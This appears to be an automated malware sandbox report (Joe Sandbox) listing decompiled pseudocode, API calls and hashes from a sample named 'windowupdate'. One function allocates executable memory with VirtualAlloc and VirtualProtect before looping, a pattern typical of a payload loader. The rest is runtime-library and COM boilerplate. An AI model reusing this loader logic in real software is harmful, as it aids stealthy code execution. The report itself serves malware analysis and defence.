                      				 *_v156 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff4));
                      				 *((char*)(_v156 + (1 << 0))) =  *((intOrPtr*)(_t346 + 0xbadba1));
                      				 *((char*)(_v156 + (1 << 1))) =  *((intOrPtr*)(_t346 + 0xbadba1));
                      				_t323 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff7));
                      				 *((char*)(_v156 + 3)) = _t323;
                      				_t341 = _t348;
                      				_t239 = _v192();
                      				__eflags = _t348 - _t348;
                      				E00DC1520(_t239, _t348 - _t348);
                      				while(1) {
                      					__eflags = 1;
                      					if(1 == 0) {
                      						break;
                      					}
                      					_t341 = _t348;
                      					Sleep(0x320); // executed
                      					__eflags = _t348 - _t348;
                      					E00DC1520(1, _t348 - _t348);
                      				}
                      				E00DC14C0(_t346, 0xdbfdc0);
                      				_t243 = 1;
                      				_t325 = _t323;
                      				_t244 = E00D47280(_t243, _t266, _v8 ^ _t346, _t325, _t337, _t341);
                      				__eflags = _t346 - _t348 + 0xbc;
                      				return E00DC1520(_t244, _t346 - _t348 + 0xbc);
                      			}

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040,?), ref: 00DBFA05
                      • VirtualProtect.KERNEL32(?,00000100,00000040,00000000), ref: 00DBFA44
                      • MessageBoxA.USER32 ref: 00DBFBBD
                      • MessageBoxA.USER32 ref: 00DBFBEC
                      • MessageBoxA.USER32 ref: 00DBFC62
                      • MessageBoxA.USER32 ref: 00DBFCC8
                      • Sleep.KERNEL32(00000320), ref: 00DBFD83
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DBFD9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Message$Virtual$AllocCheckProtectSleepStackVars@8
                      • String ID: $!$#$&$+$0$2$6$:$<$C$D$F$F$L$L$M$P$R$T$W$X$X$X$c$d$d$h$i$i$k$n$v$x$y$y
                      • API String ID: 657854547-2692607833
                      • Opcode ID: a2ec57802a7d9ab294efcf4891c3954bdff9c0c457a0315e69cafee651194066
                      • Instruction ID: cd122aaa8ad8fa5fdb6da36c43526885a630c06d1e26384bdaf0d1e91ffe9442
                      • Opcode Fuzzy Hash: a2ec57802a7d9ab294efcf4891c3954bdff9c0c457a0315e69cafee651194066
                      • Instruction Fuzzy Hash: 3B026E20D087D9CEDB218BBC88447DDBF71AB12324F0842D8E5A96B3D2C7B54985CB66
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E00DA8BF0(intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                      				signed int _v8;
                      				char _v12;
                      				char _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				char _v84;
                      				char _v88;
                      				signed int _t130;
                      				void* _t133;
                      				void* _t140;
                      				void* _t144;
                      				void* _t149;
                      				void* _t178;
                      				intOrPtr _t179;
                      				intOrPtr _t198;
                      				intOrPtr _t202;
                      				void* _t272;
                      				void* _t273;
                      				void* _t274;
                      				void* _t275;
                      				void* _t276;
                      
                      				if(_a20 > 0) {
                      					_t202 = E00DB2B80(_a16, _a20);
                      					_t272 = _t272 + 8;
                      					_v28 = _t202;
                      					if(_v28 >= _a20) {
                      						_a20 = _v28;
                      					} else {
                      						_a20 = _v28 + 1;
                      					}
                      				}
                      				_v8 = 0;
                      				if(_a32 == 0) {
                      					_a32 =  *((intOrPtr*)( *_a4 + 8));
                      				}
                      				if(_a36 == 0) {
                      					_v32 = 1;
                      				} else {
                      					_v32 = 9;
                      				}
                      				_t130 = E00DA0990(_a32, _v32, _a16, _a20, 0, 0);
                      				_t273 = _t272 + 0x18;
                      				_v20 = _t130;
                      				if(_v20 != 0) {
                      					_t133 = E00DA5110(_v20 << 1);
                      					_t274 = _t273 + 4;
                      					if(_t133 == 0) {
                      						_v36 = 0;
                      					} else {
                      						_t198 = E00DA5140(E00D89580(E00DA5110(_v20 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0x6a), 0xdddd);
                      						_t274 = _t274 + 0x1c;
                      						_v36 = _t198;
                      					}
                      					E00DA5090( &_v12,  *((intOrPtr*)(E00DA50B0( &_v84, _v36))));
                      					if((E00DA8BC0( &_v12) & 0x000000ff) != 0) {
                      						_t140 = E00DA0990(_a32, 1, _a16, _a20, E00DA50F0( &_v12), _v20);
                      						_t275 = _t274 + 0x18;
                      						if(_t140 != 0) {
                      							_v8 = E00D93D90(_a8, _a12, E00DA50F0( &_v12), _v20, 0, 0, 0, 0, 0);
                      							if(_v8 != 0) {
                      								if((_a12 & 0x00000400) == 0) {
                      									_v24 = _v8;
                      									_t144 = E00DA5110(_v24 << 1);
                      									_t276 = _t275 + 4;
                      									if(_t144 == 0) {
                      										_v40 = 0;
                      									} else {
                      										_t178 = E00D89580(E00DA5110(_v24 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0xa3); // executed
                      										_t179 = E00DA5140(_t178, 0xdddd);
                      										_t276 = _t276 + 0x1c;
                      										_v40 = _t179;
                      									}
                      									E00DA5090( &_v16,  *((intOrPtr*)(E00DA50B0( &_v88, _v40))));
                      									if((E00DA8BC0( &_v16) & 0x000000ff) != 0) {
                      										_t149 = E00DA50F0( &_v16);
                      										_v8 = E00D93D90(_a8, _a12, E00DA50F0( &_v12), _v20, _t149, _v24, 0, 0, 0);
                      										if(_v8 != 0) {
                      											if(_a28 != 0) {
                      												_v8 = E00DA0A90(_a32, 0, E00DA50F0( &_v16), _v24, _a24, _a28, 0, 0);
                      												if(_v8 != 0) {
                      													L40:
                      													E00DA50D0( &_v16);
                      													L41:
                      													_v80 = _v8;
                      													E00DA50D0( &_v12);
                      													return _v80;
                      												}
                      												_v76 = _v8;
                      												E00DA50D0( &_v16);
                      												E00DA50D0( &_v12);
                      												return _v76;
                      											}
                      											_v8 = E00DA0A90(_a32, 0, E00DA50F0( &_v16), _v24, 0, 0, 0, 0);
                      											if(_v8 != 0) {
                      												goto L40;
                      											}
                      											_v72 = _v8;
                      											E00DA50D0( &_v16);
                      											E00DA50D0( &_v12);
                      											return _v72;
                      										}
                      										_v68 = _v8;
                      										E00DA50D0( &_v16);
                      										E00DA50D0( &_v12);
                      										return _v68;
                      									} else {
                      										_v64 = 0;
                      										E00DA50D0( &_v16);
                      										E00DA50D0( &_v12);
                      										return _v64;
                      									}
                      								}
                      								if(_a28 == 0) {
                      									L26:
                      									goto L41;
                      								}
                      								if(_v8 <= _a28) {
                      									_v8 = E00D93D90(_a8, _a12, E00DA50F0( &_v12), _v20, _a24, _a28, 0, 0, 0);
                      									if(_v8 != 0) {
                      										goto L26;
                      									}
                      									_v60 = _v8;
                      									E00DA50D0( &_v12);
                      									return _v60;
                      								}
                      								_v56 = 0;
                      								E00DA50D0( &_v12);
                      								return _v56;
                      							}
                      							_v52 = _v8;
                      							E00DA50D0( &_v12);
                      							return _v52;
                      						}
                      						_v48 = _v8;
                      						E00DA50D0( &_v12);
                      						return _v48;
                      					} else {
                      						_v44 = 0;
                      						E00DA50D0( &_v12);
                      						return _v44;
                      					}
                      				} else {
                      					return 0;
                      				}
                      			}

                      APIs
                      • __wcstombs_l.LIBCMTD ref: 00DA8CB3
                      • __MarkAllocaS.LIBCMTD ref: 00DA8CBC
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA8CD7
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA8CE2
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA8D00
                        • Part of subcall function 00DA0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 00DA09C3
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA8D3D
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA8D80
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp, xrefs: 00DA8C9D, 00DA8E2B
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                      • API String ID: 3719586419-1038314930
                      • Opcode ID: 36768c68e881182292ac67770d7bc3b3e58ec5328f5b76f338590e01d195dacc
                      • Instruction ID: 025c6da9d4995e4cfd97fc923df114fd58e257a257c696d29fd7f8275215074a
                      • Opcode Fuzzy Hash: 36768c68e881182292ac67770d7bc3b3e58ec5328f5b76f338590e01d195dacc
                      • Instruction Fuzzy Hash: ACC13AB1900209EFCB04EF94D8A1BEEB7B5EF55304F244558F906AB285DB70AE44DBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E00D3CB60(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				struct HWND__* _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				char _v30;
                      				char _v32;
                      				MSG* _v40;
                      				struct tagMSG _v72;
                      				intOrPtr _v80;
                      				intOrPtr _v84;
                      				void _v88;
                      				short _t49;
                      				MSG* _t52;
                      				struct HWND__* _t54;
                      				void* _t56;
                      				intOrPtr _t58;
                      				int _t63;
                      				long _t65;
                      				void* _t67;
                      				void* _t68;
                      				void* _t70;
                      				void* _t71;
                      				intOrPtr _t72;
                      				intOrPtr _t82;
                      				MSG* _t98;
                      				void* _t110;
                      				void* _t111;
                      				void* _t112;
                      				void* _t113;
                      
                      				_t78 = __ebx;
                      				_push(__ecx);
                      				_t102 =  &_v88;
                      				memset( &_v88, 0xcccccccc, 0x15 << 2);
                      				_t112 = _t111 + 0xc;
                      				_pop(_t82);
                      				_v8 = _t82;
                      				_v12 = E00DC1520(GetCommandLineA(), _t112 - _t112);
                      				_t106 = _t112;
                      				__imp__CoInitialize(0); // executed
                      				E00DC1520(_t47, _t112 - _t112);
                      				_v16 = 0;
                      				_v24 = 1;
                      				_t49 =  *((intOrPtr*)("-/")); // 0x2f2d
                      				_v32 = _t49;
                      				_t83 =  *0xdefd96; // 0x0
                      				_v30 = _t83;
                      				E00DBF830(__ebx, _t102 + 0x15, _t112); // executed
                      				_t98 =  &_v32;
                      				_t52 = E00D33F80(_t83, _t106, _v12, _t98);
                      				_t113 = _t112 + 8;
                      				_v40 = _t52;
                      				while(_v40 != 0) {
                      					_t71 = E00D34020(_t106, _v40, "UnregServer");
                      					_t113 = _t113 + 8;
                      					if(_t71 != 0) {
                      						_t98 = _v40;
                      						_t72 = E00D34020(_t106, _t98, "RegServer");
                      						_t113 = _t113 + 8;
                      						__eflags = _t72;
                      						if(_t72 != 0) {
                      							_t83 = _v40;
                      							_t52 = E00D33F80(_v40, _t106, _v40,  &_v32);
                      							_t113 = _t113 + 8;
                      							_v40 = _t52;
                      							continue;
                      						}
                      						_v20 = E00D3D160(_v8);
                      						__eflags = _v20;
                      						if(__eflags >= 0) {
                      							_v20 = E00D3D200(_t78, _v8, _t106, __eflags, 1, 0);
                      						}
                      						_t54 = 0;
                      						goto L28;
                      					} else {
                      						_v20 = E00D3D190(_t78, _v8, _t106, 1, 0);
                      						if(_v20 >= 0) {
                      							_v20 = E00D3D130(_v8);
                      						}
                      						_t54 = 0;
                      						L28:
                      						_push(_t98);
                      						E00DC14C0(_t110, 0xd3cdd4);
                      						_t56 = _t54;
                      						return E00DC1520(_t56, _t110 - _t113 + 0x54);
                      					}
                      				}
                      				__eflags = _v24;
                      				if(_v24 == 0) {
                      					L27:
                      					__imp__CoUninitialize();
                      					__eflags = _t113 - _t113;
                      					E00DC1520(_t52, _t113 - _t113);
                      					_t54 = _v16;
                      					goto L28;
                      				}
                      				__eflags =  *0xf236b8;
                      				if(__eflags != 0) {
                      					_t70 = L00D84930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a0, 0, "%ls", 0);
                      					_t113 = _t113 + 0x18;
                      					__eflags = _t70 - 1;
                      					if(_t70 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				_t58 = E00D47950(_t83, 0x2c);
                      				_t113 = _t113 + 4;
                      				_v84 = _t58;
                      				__eflags = _v84;
                      				if(__eflags == 0) {
                      					_v88 = 0;
                      				} else {
                      					_v88 = E00DC1350(_v84, __eflags);
                      				}
                      				_v80 = _v88;
                      				 *0xf236b8 = _v80;
                      				E00D3DD40(_t78,  *0xf236b8, _t106, 0, 0);
                      				E00D3C410( *0xf236b8 + 4, _t106, 1);
                      				__eflags =  *0xf236b8;
                      				if(__eflags == 0) {
                      					_t68 = L00D84930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a4, 0, "%ls", 0);
                      					_t113 = _t113 + 0x18;
                      					__eflags = _t68 - 1;
                      					if(__eflags == 0) {
                      						asm("int3");
                      					}
                      				}
                      				_v20 = E00D3CF20(_v8, _t106, __eflags, 4, 1);
                      				__eflags = _v20;
                      				if(__eflags < 0) {
                      					_t67 = L00D84930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a8, 0, "%ls", L"SUCCEEDED(res)");
                      					_t113 = _t113 + 0x18;
                      					__eflags = _t67 - 1;
                      					if(_t67 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				while(1) {
                      					_t108 = _t113;
                      					_t63 = GetMessageA( &_v72, 0, 0, 0);
                      					__eflags = _t113 - _t113;
                      					__eflags = E00DC1520(_t63, _t113 - _t113);
                      					if(__eflags == 0) {
                      						break;
                      					}
                      					_t98 =  &_v72;
                      					_t65 = DispatchMessageA(_t98);
                      					__eflags = _t113 - _t113;
                      					E00DC1520(_t65, _t113 - _t113);
                      				}
                      				_t52 = E00D3CEF0(_v8, _t108, __eflags);
                      				goto L27;
                      			}

                      APIs
                      • GetCommandLineA.KERNEL32 ref: 00D3CB7E
                      • CoInitialize.OLE32(00000000), ref: 00D3CB92
                        • Part of subcall function 00D33F80: CharNextA.USER32(00000000), ref: 00D33FC8
                      • new.LIBCMTD ref: 00D3CCAA
                      • GetMessageA.USER32 ref: 00D3CD70
                      • DispatchMessageA.USER32 ref: 00D3CD87
                      • CoUninitialize.OLE32 ref: 00D3CDA0
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3CDBA
                        • Part of subcall function 00D34020: CharUpperA.USER32 ref: 00D3403E
                        • Part of subcall function 00D34020: CharUpperA.USER32(00000000), ref: 00D34057
                        • Part of subcall function 00D34020: CharNextA.USER32(CCCCCCCC), ref: 00D34097
                        • Part of subcall function 00D34020: CharNextA.USER32(?), ref: 00D340AD
                        • Part of subcall function 00D34020: CharUpperA.USER32(00000000), ref: 00D340C6
                        • Part of subcall function 00D34020: CharUpperA.USER32 ref: 00D340DF
                        • Part of subcall function 00D33F80: CharNextA.USER32(00000000), ref: 00D33FDD
                        • Part of subcall function 00D33F80: CharNextA.USER32(00000000), ref: 00D33FF5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Char$Next$Upper$Message$CheckCommandDispatchInitializeLineStackUninitializeVars@8
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\Atlduck.cpp$RegServer$SUCCEEDED(res)$UnregServer
                      • API String ID: 1965964818-240722375
                      • Opcode ID: 2e4772dfae96dd2c3741a4b905fe6d50af0f0926a0d07c7344b21de281dc3f08
                      • Instruction ID: a3977f9cfea98fa1abb664feeda26d3a43b3df53930e8405ed98b73acfb421d4
                      • Opcode Fuzzy Hash: 2e4772dfae96dd2c3741a4b905fe6d50af0f0926a0d07c7344b21de281dc3f08
                      • Instruction Fuzzy Hash: 4761B075E10319ABDB20FBA0ED07B9EB771EB44704F101428F505BB282E7B5AA44CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 256 d47330-d47358 InitializeCriticalSectionAndSpinCount GetModuleHandleW 257 d47368-d4736c 256->257 258 d4735a-d47365 GetModuleHandleW 256->258 259 d47375-d4739d GetProcAddress * 2 257->259 260 d4736e-d47370 call d48a40 257->260 258->257 262 d4739f-d473a3 259->262 263 d473b8-d473d2 CreateEventW 259->263 260->259 262->263 264 d473a5-d473b6 262->264 265 d473d4-d473d6 call d48a40 263->265 266 d473db-d473de 263->266 264->266 265->266
                      C-Code - Quality: 100%
                      			E00D47330(void* __edx) {
                      				struct HINSTANCE__* _v8;
                      				_Unknown_base(*)()* _v12;
                      				_Unknown_base(*)()* _v16;
                      				struct HINSTANCE__* _t14;
                      				void* _t18;
                      				intOrPtr _t20;
                      				void* _t23;
                      				void* _t25;
                      				void* _t27;
                      				void* _t28;
                      
                      				_t25 = __edx;
                      				InitializeCriticalSectionAndSpinCount(0xf20264, 0xfa0);
                      				_t14 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
                      				_v8 = _t14;
                      				if(_v8 == 0) {
                      					_v8 = GetModuleHandleW(L"kernel32.dll");
                      				}
                      				if(_v8 == 0) {
                      					E00D48A40(_t23, _t25, _t27, _t28, 7);
                      				}
                      				_v12 = GetProcAddress(_v8, "SleepConditionVariableCS");
                      				_v16 = GetProcAddress(_v8, "WakeAllConditionVariable");
                      				if(_v12 != 0 && _v16 != 0) {
                      					 *0xf2027c = _v12;
                      					_t20 = _v16;
                      					 *0xf20280 = _t20;
                      					return _t20;
                      				}
                      				_t18 = CreateEventW(0, 1, 0, 0);
                      				 *0xf20260 = _t18;
                      				if( *0xf20260 == 0) {
                      					return E00D48A40(_t23, _t25, _t27, _t28, 7);
                      				}
                      				return _t18;
                      			}

                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00F20264,00000FA0), ref: 00D47340
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 00D4734B
                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D4735F
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D4737E
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D47390
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D473C0
                        • Part of subcall function 00D48A40: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D48A4B
                        • Part of subcall function 00D48A40: IsDebuggerPresent.KERNEL32 ref: 00D48B1B
                        • Part of subcall function 00D48A40: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D48B47
                        • Part of subcall function 00D48A40: UnhandledExceptionFilter.KERNEL32(00000007), ref: 00D48B51
                      Strings
                      • kernel32.dll, xrefs: 00D4735A
                      • WakeAllConditionVariable, xrefs: 00D47387
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D47346
                      • SleepConditionVariableCS, xrefs: 00D47375
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressExceptionFilterHandleModulePresentProcUnhandled$CountCreateCriticalDebuggerEventFeatureInitializeProcessorSectionSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 839355944-3242537097
                      • Opcode ID: 0869b48c76c3ad3c1f5633e45a41296f6734aeafc5b9fd671e4c3f4cc08a02bb
                      • Instruction ID: 2f0d6e6daff93b1980260fc66e8eebad20dca3bb0019635b37346601e3e08e6c
                      • Opcode Fuzzy Hash: 0869b48c76c3ad3c1f5633e45a41296f6734aeafc5b9fd671e4c3f4cc08a02bb
                      • Instruction Fuzzy Hash: 5F11DA74D4830AEFDB50EFA0E84EF9CBB70AB04701F14419AA915A62D1DBB45544FB71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 268 d9f960-d9f995 call d9fb20 call d9f410 273 d9f99e-d9f9cd call d89580 call d8e560 call d8e620 268->273 274 d9f997-d9f999 268->274 282 d9f9cf-d9f9e1 call d8e5c0 273->282 283 d9f9e6-d9fa18 call d8eae0 * 3 call d9fe00 273->283 275 d9fb0c-d9fb11 274->275 282->275 293 d9fa1d-d9fa27 283->293 294 d9fa29-d9fa46 call d82f70 call d8e5c0 293->294 295 d9fa4b-d9fa51 293->295 294->275 296 d9fa58-d9fa66 295->296 297 d9fa53 call d8ece0 295->297 300 d9fa68-d9fa72 296->300 301 d9fa85-d9faad call d8eae0 call d8ea70 296->301 297->296 300->301 303 d9fa74-d9fa82 call d89480 300->303 312 d9faba-d9facb call d8e5c0 301->312 313 d9faaf-d9fab8 301->313 303->301 312->275 313->312 314 d9facd-d9faee call d9f1d0 call d9f0f0 313->314 321 d9fafb-d9fb09 call d8e5c0 314->321 322 d9faf0-d9faf5 314->322 321->275 322->321
                      C-Code - Quality: 97%
                      			E00D9F960(void* __ebx, void* __eflags, intOrPtr _a4, signed int _a8, char _a12, void* _a16) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				char _v40;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t54;
                      				void* _t56;
                      				intOrPtr _t64;
                      				signed int _t65;
                      				signed int _t104;
                      				char _t117;
                      				void* _t125;
                      				void* _t127;
                      				void* _t129;
                      				void* _t130;
                      				void* _t132;
                      				void* _t134;
                      
                      				_t134 = __eflags;
                      				E00D9FB20(_a12, _a16);
                      				_t54 = E00D9F410(__ebx, _t125, _t134, _a4);
                      				_t129 = _t127 + 0xc;
                      				_v16 = _t54;
                      				if(_v16 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
                      					_t56 = E00D89580(0x220, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\mbstring\\mbctype.cpp", 0x19a);
                      					_t130 = _t129 + 0x10;
                      					E00D8E560( &_v8, _t56);
                      					__eflags = E00D8E620( &_v8) & 0x000000ff;
                      					if(__eflags != 0) {
                      						memcpy(E00D8EAE0( &_v8),  *(_a12 + 0x48), 0x88 << 2);
                      						 *(E00D8EAE0( &_v8)) = 0;
                      						_t64 = E00D9FE00(__ebx,  &_v8, _v16,  *(_a12 + 0x48) + 0x110, __eflags, _v16, E00D8EAE0( &_v8)); // executed
                      						_t132 = _t130 + 0x14;
                      						_v12 = _t64;
                      						__eflags = _v12 - 0xffffffff;
                      						if(_v12 != 0xffffffff) {
                      							_t65 = _a8 & 0x000000ff;
                      							__eflags = _t65;
                      							if(_t65 == 0) {
                      								_t65 = E00D8ECE0();
                      							}
                      							asm("lock xadd [edx], eax");
                      							__eflags = (_t65 | 0xffffffff) == 1;
                      							if((_t65 | 0xffffffff) == 1) {
                      								__eflags =  *(_a12 + 0x48) - 0xdf6548;
                      								if(__eflags != 0) {
                      									L00D89480(__eflags,  *(_a12 + 0x48), 2);
                      									_t132 = _t132 + 8;
                      								}
                      							}
                      							 *(E00D8EAE0( &_v8)) = 1;
                      							 *(_a12 + 0x48) = E00D8EA70( &_v8);
                      							_t117 = _a12;
                      							__eflags =  *(_t117 + 0x350) & 0x00000002;
                      							if(( *(_t117 + 0x350) & 0x00000002) != 0) {
                      								L13:
                      								_v28 = _v12;
                      								E00D8E5C0( &_v8);
                      								return _v28;
                      							} else {
                      								_t104 =  *0xdf67cc; // 0xfffffffe
                      								__eflags = _t104 & 0x00000001;
                      								if(__eflags == 0) {
                      									E00D9F0F0(__eflags, 5, E00D9F1D0( &_v40,  &_a12,  &_a16));
                      									__eflags = _a8 & 0x000000ff;
                      									if((_a8 & 0x000000ff) != 0) {
                      										 *0xdf61e4 =  *_a16;
                      									}
                      									_v32 = _v12;
                      									E00D8E5C0( &_v8);
                      									return _v32;
                      								}
                      								goto L13;
                      							}
                      						}
                      						 *((intOrPtr*)(L00D82F70( &_v8))) = 0x16;
                      						_v24 = 0xffffffff;
                      						E00D8E5C0( &_v8);
                      						return _v24;
                      					}
                      					_v20 = 0xffffffff;
                      					E00D8E5C0( &_v8);
                      					return _v20;
                      				}
                      				return 0;
                      			}

                      APIs
                        • Part of subcall function 00D9F410: GetOEMCP.KERNEL32(00000000), ref: 00D9F445
                      • __wcstombs_l.LIBCMTD ref: 00D9F9AF
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9F9BB
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\mbstring\mbctype.cpp, xrefs: 00D9F9A3
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
